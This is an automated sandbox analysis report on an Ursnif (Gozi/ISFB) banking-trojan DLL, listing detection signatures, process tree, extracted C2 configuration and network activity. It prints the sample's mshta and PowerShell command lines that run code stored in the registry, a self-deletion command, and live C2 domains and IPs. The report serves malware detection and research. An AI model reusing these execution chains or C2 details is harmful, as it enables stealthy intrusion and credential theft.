
Windows Analysis Report uT9rwkGATJ.dll

Overview

General Information

Sample Name: uT9rwkGATJ.dll
Analysis ID: 499264
MD5: 9a453cc31ebfca29d8df565258fbf8ce
SHA1: 5eb3be88abb84f63e04c92bc3e35a82a01689971
SHA256: eaed947e04ed7659fbba2287e6965b2c0960035aa539b57a9f9e15504a01ca0a
Tags: dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: Powershell run code from registry
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Suspicious powershell command line found
Machine Learning detection for sample
Allocates memory in foreign processes
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6424 cmdline: loaddll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6392 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6388 cmdline: rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 3548 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 6040 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 6400 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Camptiny MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5980 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,Consonantget MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5868 cmdline: rundll32.exe C:\Users\user\Desktop\uT9rwkGATJ.dll,LongSubstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • control.exe (PID: 4000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • rundll32.exe (PID: 6504 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6856 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6972 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 1304 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5452 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 4452 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • cmd.exe (PID: 1460 cmdline: 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 6372 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
  • mshta.exe (PID: 5772 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5480 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 344 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3380 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5640 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4880 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "Wa0ptOHdbeWyaLju6Av14Mh7FDVECzYw3M++OWU/cFwf0ZjLctG17DYP/MFVk/hMExgeVHSsuIoKkcbpz57JUku89Z6sGfWSZvCVyvpfi1ZpEwDNNeNw5k5dpgwB3LsIS45sMaK472UpYahrOWaY66CWVjJyKzpo2y/tq1ZiFHe/iFygPyws634yVgV7rQhjAPiNPuq0SMLwHnadf5iTBRPHNZOfo4EV1JOy+KK7FD2JiBwbgL2xH8mvgvUrMN0gphdmog43p4QO6+T4499NqSdjKKJutU5bxT8XtJKvzMrbRLkRwTKw+5msPiKoZk2Mmt6I5yjyUlMUijuRPmFH+uUAMGA+NmgwHR/EoB9vyak=", "c2_domain": ["outlook.com", "zereunrtol.website", "xereunrtol.website"], "botnet": "2525", "server": "12", "serpent_key": "10218409ILPAQDIR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(29 entries in total; 5 shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.loaddll32.exe.b00000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.4a794a0.1.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.96a309.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
0.2.loaddll32.exe.13494a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
4.3.rundll32.exe.4a794a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
(15 entries in total; 5 shown)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started | Author: Michael Haag | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: Mshta Spawning Windows Shell
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6972, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline', ProcessId: 1304
Sigma detected: Suspicious Rundll32 Activity
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4000, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6504
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972
Sigma detected: T1086 PowerShell Execution
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132781743762523748.6972.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started | Author: Joe Security | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6856, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram)), ProcessId: 6972

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (configuration as listed under Malware Configuration above)
Machine Learning detection for sample
Source: uT9rwkGATJ.dll | Joe Sandbox ML: detected
Source: uT9rwkGATJ.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: uT9rwkGATJ.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Binary string: c:\Toward\clock-sit\Only_Girl\Teach.pdb | source: loaddll32.exe, 00000000.00000002.823565020.000000006E1D2000.00000002.00020000.sdmp
Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: d.pdbp | source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000000.00000003.685807008.0000000004360000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.699239649.0000000006460000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\uio4qdnj.pdb~U | source: powershell.exe, 00000017.00000003.756929105.0000026CBE732000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\hiiw3gsl.pdb | source: powershell.exe, 0000001B.00000002.812366311.0000029704754000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00B52E19 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.178.98 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 193.29.104.83 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.101.9.178 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.97.160.2 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: zereunrtol.website
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknown | Network traffic detected: HTTP traffic on port 49766 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49833 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49831 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknown | Network traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49829 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49830 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Length: 1245 | Content-Type: text/html | Server: Microsoft-IIS/10.0 | request-id: 973402f4-6725-3934-5235-dbb411665df2 | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | X-CalculatedFETarget: DB3PR08CU001.internal.outlook.com | X-BackEndHttpStatus: 404 | X-FEProxyInfo: DB3PR08CA0032.EURPRD08.PROD.OUTLOOK.COM | X-CalculatedBETarget: DB8P193MB0645.EURP193.PROD.OUTLOOK.COM | X-BackEndHttpStatus: 404 | X-RUM-Validated: 1 | X-Proxy-RoutingCorrectness: 1 | X-Proxy-BackendServerStatus: 404 | MS-CV: 9AI0lyVnNDlSNdu0EWZd8g.1.1 | X-FEServer: DB3PR08CA0032 | X-Powered-By: ASP.NET | X-FEServer: AM6P193CA0099 | Date: Fri, 08 Oct 2021 04:45:27 GMT | Connection: close
